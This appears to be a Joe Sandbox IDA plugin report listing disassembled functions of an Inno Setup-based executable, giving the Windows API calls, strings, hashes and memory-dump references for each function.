Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 258d9deb6f7a10e014db2841a00646f08a98b62604f56307b5f20277c9267f14
Instruction ID: 68a963c4b4ce3cb9fa4489d147f84cdc209e61955976dc0c42ca8291dd14a8a4
Opcode Fuzzy Hash: 258d9deb6f7a10e014db2841a00646f08a98b62604f56307b5f20277c9267f14
Instruction Fuzzy Hash: 1501C0707842405EFB19AB6998A27353ED4D796748F91803BF440A6AF1C67C4840CB6D

Function 0045C30C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 004509A0: SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7

FlushFileBuffers.KERNEL32(?), ref: 0045C541

Strings

NumRecs range exceeded, xrefs: 0045C43E
EndOffset range exceeded, xrefs: 0045C475

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: f4838951b250da02c76fa3d1935671775a2aba9884ef291465624927e2e75a92
Instruction ID: 57127da9839884e48f93c65e4688b7b5a24f3d4ce709f11da5987aa0442ebed2
Opcode Fuzzy Hash: f4838951b250da02c76fa3d1935671775a2aba9884ef291465624927e2e75a92
Instruction Fuzzy Hash: E461A234A003588FDB25DF25C891AD9B7B5EF49305F0084DAED89AB352DA74AEC8CF54

Function 00499280 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049928E), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049928E), ref: 00403356

Part of subcall function 0040632C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00499298), ref: 00406332
Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040633F
Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406355
Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040636B
Part of subcall function 0040632C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00499298), ref: 00406376

Part of subcall function 004063D4: 6F9C1CD0.COMCTL32(0049929D), ref: 004063D4

Part of subcall function 00410774: GetCurrentThreadId.KERNEL32 ref: 004107C2

Part of subcall function 00419050: GetVersion.KERNEL32(004992B6), ref: 00419050

Part of subcall function 0044F7B8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004992CA), ref: 0044F7F3
Part of subcall function 0044F7B8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F7F9

Part of subcall function 0044FC84: GetVersionExA.KERNEL32(0049C790,004992CF), ref: 0044FC93

Part of subcall function 00453264: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 00453284
Part of subcall function 00453264: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045328A
Part of subcall function 00453264: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 0045329E
Part of subcall function 00453264: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004532A4

Part of subcall function 0045715C: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00457180

Part of subcall function 0046469C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004992F2), ref: 004646AB
Part of subcall function 0046469C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004646B1

Part of subcall function 0046CEF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CF05

Part of subcall function 0047905C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004992FC), ref: 00479062
Part of subcall function 0047905C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047906F
Part of subcall function 0047905C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047907F

Part of subcall function 0048446C: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0048455B

Part of subcall function 0049628C: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004962A5

SetErrorMode.KERNEL32(00000001,00000000,00499344), ref: 00499316

Part of subcall function 00499040: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00499320,00000001,00000000,00499344), ref: 0049904A
Part of subcall function 00499040: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00499050

Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

ShowWindow.USER32(?,00000005,00000000,00499344), ref: 00499377

Part of subcall function 00482AAC: SetActiveWindow.USER32(?), ref: 00482B5A

Strings

Setup, xrefs: 0049935D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
String ID: Setup
API String ID: 504348408-3839654196
Opcode ID: 233cc421e83f8cc3dcda037f4a9b597bd0151155db56c05575de1988a9d1a60d
Instruction ID: 0ced0f24ac175d21b3299cf0cac8cd2bc44ae01cd64648103e70fccb26a7f3a2
Opcode Fuzzy Hash: 233cc421e83f8cc3dcda037f4a9b597bd0151155db56c05575de1988a9d1a60d
Instruction Fuzzy Hash: A231C6312086408FD6117BBBEC5365D3BA8EB8D718BA2447FF80496693DE3D5C118A7E

Function 00453A98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B87,?,?,00000000,0049C628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453ADE
GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B87,?,?,00000000,0049C628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453AE7

Strings

.tmp, xrefs: 00453AC7

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 2e6224e559e09b21c1e7174e7b36b30504437a5f64767d5dc9f4cda500c72cf1
Instruction ID: ff9a18ef253650dbf03605879231b3438c9749bdb0146341c5730265e1144e14
Opcode Fuzzy Hash: 2e6224e559e09b21c1e7174e7b36b30504437a5f64767d5dc9f4cda500c72cf1
Instruction Fuzzy Hash: A4213674A00208ABDB01EFA5C8529EEB7B8EB44315F50457BF801B7342DA389F058B69

Function 0048446C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00483F60: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483F71
Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483F7E
Part of subcall function 00483F60: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483F8C
Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483F94
Part of subcall function 00483F60: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483FA0
Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483FC1
Part of subcall function 00483F60: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483FD4
Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483FDA

Part of subcall function 0048428C: GetVersionExA.KERNEL32(?,0048449E,00000000,00484573,?,?,?,?,?,00499301), ref: 0048429A
Part of subcall function 0048428C: GetVersionExA.KERNEL32(0000009C,?,0048449E,00000000,00484573,?,?,?,?,?,00499301), ref: 004842EC

Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD

GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0048455B

Strings

shell32.dll, xrefs: 00484550
SHGetKnownFolderPath, xrefs: 00484546

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
String ID: SHGetKnownFolderPath$shell32.dll
API String ID: 3869789854-2936008475
Opcode ID: 9e6442ad45a9baf58573cca34446e5dc04ecce57dab5d62ccafdb81a0b60815b
Instruction ID: 72a1cd0c007ae7d2331b3d049f57d6a032e0567b1decddf8ad8e9e8191a8a5bf
Opcode Fuzzy Hash: 9e6442ad45a9baf58573cca34446e5dc04ecce57dab5d62ccafdb81a0b60815b
Instruction Fuzzy Hash: D821EFB0A243416AC700BFBE596614A3BA5EB9471C390493BF800EB3D1D67E6414AB6E

Function 0047CA5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047CDB0,00000000,0047CDC6), ref: 0047CABE

Strings

RegisteredOrganization, xrefs: 0047CAAD
RegisteredOwner, xrefs: 0047CA9B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: c1b6d14e45d78727ed45f55f4f17675dd1bb73358709ca4c1a4910a815b4512c
Instruction ID: 80e31e652a078fa29572911d568a821ff54af8e3d41ae7cfbc3eead46bc77173
Opcode Fuzzy Hash: c1b6d14e45d78727ed45f55f4f17675dd1bb73358709ca4c1a4910a815b4512c
Instruction Fuzzy Hash: 99F09021B04108ABD710D664EC82B9B33A9D741308F24847FA1049B351D679AE00975C

Function 0046F03C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,JfG,?,0049D1E0,?,0046F353,?,00000000,0046F8EE,?,_is1), ref: 0046F05F

Strings

Inno Setup: Setup Version, xrefs: 0046F05D
JfG, xrefs: 0046F041

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value
String ID: Inno Setup: Setup Version$JfG
API String ID: 3702945584-2837433363
Opcode ID: ba37289afc6bf64f1b4e35152e82186c6909c63cd97613f7ebaef7afec976743
Instruction ID: 9307b71ef0b0d9a21e7f4f46c2dc1735a92df317579ad27da25cacea1a1ff421
Opcode Fuzzy Hash: ba37289afc6bf64f1b4e35152e82186c6909c63cd97613f7ebaef7afec976743
Instruction Fuzzy Hash: 0AE06D713016047FD710AA6B9C85F5BABDCDF88365F00403AB908DB392D578DD0042A8

Function 00475688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004758BF), ref: 004756AD
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004758BF), ref: 004756C4

Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513

Strings

CreateFile, xrefs: 004756B9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 79eec7588c7af6c2029a89254d08153dd0e3e04ff33533a08b7dcbd789b2e8ab
Instruction ID: 806dc226f5a2fe5ebbb1f055bcab6d135f745baec99644e0dc49489f7e0d9994
Opcode Fuzzy Hash: 79eec7588c7af6c2029a89254d08153dd0e3e04ff33533a08b7dcbd789b2e8ab
Instruction Fuzzy Hash: E4E06D303403447BEA10EA79DCC6F4A77989B04778F108151FA48AF3E2C5B9FC408A58

Function 0045715C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004570EC: CoInitialize.OLE32(00000000), ref: 004570F2

Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00457180

Strings

SHCreateItemFromParsingName, xrefs: 0045716B
shell32.dll, xrefs: 00457175

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorInitializeLibraryLoadModeProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2906209438-2320870614
Opcode ID: 117bb836f2798fba922b12c43cef4fcbc71072008b94f68fc3b4bb9dbbbeaa5f
Instruction ID: 9c527047bf7e84dae422e031a0d6d6e9bbae4a3d03e504f065b317ec79f67602
Opcode Fuzzy Hash: 117bb836f2798fba922b12c43cef4fcbc71072008b94f68fc3b4bb9dbbbeaa5f
Instruction Fuzzy Hash: 6AC04CA0B4591066C70077B6AC0361F24459B4072FB14C07BBD44A7787CE3D884D6A6E

Function 0046CEF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CF05

Strings

shell32.dll, xrefs: 0046CEFA
SHPathPrepareForWriteA, xrefs: 0046CEF0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorLibraryLoadModeProc
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2492108670-2683653824
Opcode ID: 8a5a2bfda678a4119f98cbe0ea23aba1ca22618b19e5ef326a03b239f4c9458f
Instruction ID: 33f7e53ae4e5ba8297804bd6606edee94f75655c5a8d17986cd3cb8a189a0b51
Opcode Fuzzy Hash: 8a5a2bfda678a4119f98cbe0ea23aba1ca22618b19e5ef326a03b239f4c9458f
Instruction Fuzzy Hash: CDB092B0A146405ACB446772988262B20069B4071DF60843BB4C4AB6D9EABC88492B9F

Function 004485A0 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,0044877D), ref: 004486C0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00448741

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 9192854c716958fcf12a54fd54f15ae173329ead0ce31acd6b56a672af8f6247
Instruction ID: 67510ac2dd358758032eb9bd0b15bc7699fd1d5ac1297ef1938a655c08aa7b0d
Opcode Fuzzy Hash: 9192854c716958fcf12a54fd54f15ae173329ead0ce31acd6b56a672af8f6247
Instruction Fuzzy Hash: 89515574E00109AFDB10EF95C891A9EB7F9EB44315F20817FE814BB391CA789E05CB99

Function 00482160 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,00482298), ref: 00482230
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00482241
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00482259

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Append$System
String ID:
API String ID: 1489644407-0
Opcode ID: b0f6966b6a184f1facb0a871f26b18c64fa7cdea68dfa8979e13f5b501864372
Instruction ID: a26f55f7f9cdec50315d50fbbd1418f41be5c601f9b239732c1f252fb764c371
Opcode Fuzzy Hash: b0f6966b6a184f1facb0a871f26b18c64fa7cdea68dfa8979e13f5b501864372
Instruction Fuzzy Hash: FE31CD707043451BD721BB368D86B9E3B949B5A318F50197FF900AA3E3CABC9D09839D

Function 0044B400 Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0044B475
SelectObject.GDI32(?,00000000), ref: 0044B498
ReleaseDC.USER32(00000000,?), ref: 0044B4CB

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ObjectReleaseSelect
String ID:
API String ID: 1831053106-0
Opcode ID: a18c564e5665bffaeec971d30f69da7c159b46b6830c6159626304e36c153c38
Instruction ID: 7b4e641b5f80a70363e1f29cb6207b12473e64a09d761e596b30cfa5093ee172
Opcode Fuzzy Hash: a18c564e5665bffaeec971d30f69da7c159b46b6830c6159626304e36c153c38
Instruction Fuzzy Hash: FE217970E04344BFEB11DFA5C841B9EBBB8DB49304F51807AF900A6292D77CD940CB59

Function 0044B134 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B1C0,?,00482AC7,?,?), ref: 0044B192
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B1A5
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B1D9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID:
API String ID: 65125430-0
Opcode ID: 9eed18fe0356815f810c820b6721896f6c4265f9db16303b213c34b2c03d3f04
Instruction ID: 63060d4c4a21d3a06b37f0b793f587d40fe85ad593019d515c43c5dd919fcfdf
Opcode Fuzzy Hash: 9eed18fe0356815f810c820b6721896f6c4265f9db16303b213c34b2c03d3f04
Instruction Fuzzy Hash: 3111CBB27046047FEB11DB6A9C82D6F77ECDB49750F10417BF504D72D0D6389E018669

Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
TranslateMessage.USER32(?), ref: 0042449F
DispatchMessageA.USER32(?), ref: 004244A9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
Instruction ID: 24a07c1e81c585bad35552c3917a3e7b04f02dd2aaee7f9545dc892aa94dfb52
Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
Instruction Fuzzy Hash: AE119E307043205AEE20FA64AD41B9B73D4DFE1708F80881EF8D997382D77D9E49879A

Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SetPropA.USER32(00000000,00000000), ref: 0041667A
SetPropA.USER32(00000000,00000000), ref: 0041668F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

